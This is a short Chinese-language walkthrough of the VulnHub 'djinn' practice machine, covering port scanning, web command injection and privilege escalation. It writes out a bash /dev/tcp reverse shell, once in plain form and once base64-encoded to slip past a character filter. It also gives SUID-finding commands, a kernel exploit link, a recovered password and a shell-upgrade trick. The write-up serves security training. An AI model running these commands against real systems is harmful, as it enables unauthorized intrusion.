靶機下載鏈接:
https://download.vulnhub.com/djinn/djinn.ova
主機埠掃描:
FTP發現一些檔案提示
1337埠是一個游戲,去看下
哈哈有點難,暫時放棄,看看7331HTTP server 這邊有么有發現
使用dirb dirsearch 自帶字典沒有發現,加大欄位列舉下目錄
命令執行
反彈shell bash -i >& /dev/tcp/10.10.202.142/1234 0>&1一直彈不出來,猜測特殊字符做了過濾
base64 編碼執行
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4yMDIuMTQyLzEyMzQgMD4mMQ== | base64 -d | bash
接下來進行提權操作
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
內核:Linux djinn 4.15.0-66-generic
exp提權失敗:https://www.exploit-db.com/download/47163
路徑/home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9 密碼
切換用戶可能會提示:su: must be run from a terminal
執行此命令:/usr/bin/script -qc /bin/bash /dev/null
sudo - u sam genie -cmd new
OVER!!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/5383.html
標籤:訊息安全